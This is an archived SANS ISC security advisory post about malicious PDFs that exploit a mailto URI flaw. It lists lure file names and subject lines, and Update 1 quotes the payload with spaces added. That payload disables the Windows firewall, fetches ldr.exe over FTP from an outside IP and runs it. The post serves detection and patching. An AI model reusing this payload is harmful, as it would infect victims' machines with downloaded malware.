Threat Level: green Handler on Duty: Manuel Humberto Santander Pelaez

SANS ISC: InfoSec Handlers Diary Blog - PDF mailto exploit documents in the wild InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

PDF mailto exploit documents in the wild

Published: 2007-10-23
Last Updated: 2007-10-24 00:18:25 UTC
by Adrien de Beaupre (Version: 2)
0 comment(s)

The vulnerability initially reported here http://isc.sans.org/diary.html?storyid=3406 and confirmed here (with workaround) http://isc.sans.org/diary.html?storyid=3477 and patched here http://isc.sans.org/diary.html?storyid=3531 now appears to have been spotted in the wild. The proof of concept code had been released, and a number of people have reported receiving the PDFs which exploit the vulnerability. Obviously please patch, apply the workarounds, and/or ensure you can detect and block the exploit. File names seen so far are "BILL.pdf" and "INVOICE.pdf".

Thanks Juha-Matti!

Update 1

The current exploit seen follows the following format (spaces added so anti-virus won't trigger):

obj<</URI(mailto :%/../../../../ ../../Windows /system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146. 130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/ URI>

Essentially it disables the Windows native firewall, uses FTP to download a file, and execute it. Gotcha.

Additional file names: "YOUR_BILL.pdf" and "STATEMET.pdf" some subject lines have been "INVOICE alacrity" "STATEMET indigene" and "INVOICE depredate"

Thanks Bojan!

Cheers,
Adrien de Beaupré
Bell Canada

 

 

 

Keywords:
0 comment(s)
Diary Archives